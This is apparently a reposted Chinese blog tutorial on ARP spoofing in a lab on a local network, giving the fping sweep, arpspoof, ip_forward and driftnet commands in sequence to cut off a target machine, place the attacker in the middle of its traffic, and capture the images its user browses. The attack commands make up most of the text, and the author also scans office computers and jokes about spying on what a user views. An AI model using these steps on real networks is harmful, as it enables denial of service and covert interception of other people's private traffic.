ARP欺骗获取同网段信息

来源:互联网 发布:windows 服务安装 编辑:程序博客网 时间:2024/06/07 02:35

1. 实验环境


kali虚拟机、物理机

  • kali虚拟机需要桥接网络(环境是需要在同一网段下进行的),至于虚拟机桥接网络连接方式不通的问题,是需要设置路由器的工作模式
    这里写图片描述
    这里写图片描述
    分别是虚拟机和物理机的ip信息,都是192.168.1.*的网段下

    2. 寻找目标

  • fping 命令
    命令说明fping -h
    这里写图片描述
    全是英文。。。。
    命令参数翻译使用说明在这里http://www.cnblogs.com/dunitian/p/5074783.html

  • fping -g 192.168.1.0/2(寻找在线目标)
    这里写图片描述
    可以看到在线ip地址(办公室的几台电脑),102是我的物理机地址。

    3.断网攻击

  • Arpspoof -i 网卡 -t 目标 IP 网关
    kali虚拟机网卡:eth0
    目标地址(物理机):192.168.1.102
    网关:192.168.1.253

这里写图片描述
输入命令开始攻击
这里写图片描述
这里写图片描述
可以看到攻击一瞬间、物理机马上出现问题,网页打不开、听着的音乐跟着停下来

4.进行欺骗获取物理机信息

  • echo 1 >/proc/sys/net/ipv4/ip_forward
  • 原理是使被攻击机的流量转发到攻击机的网卡进行流量转发

这里写图片描述
输入命令之后不会有回显,且被攻击机恢复上网(音乐响起)
这里写图片描述

5.获取攻击机图片

  • driftnet -i eth0
    这里写图片描述
    被攻击机机浏览网页或者浏览私密信息
    这里写图片描述
    kali攻击机开启监听……(活捉一只张杰粉)
    这里写图片描述

手机拍的图,这样子看起来效果好一点。

原创粉丝点击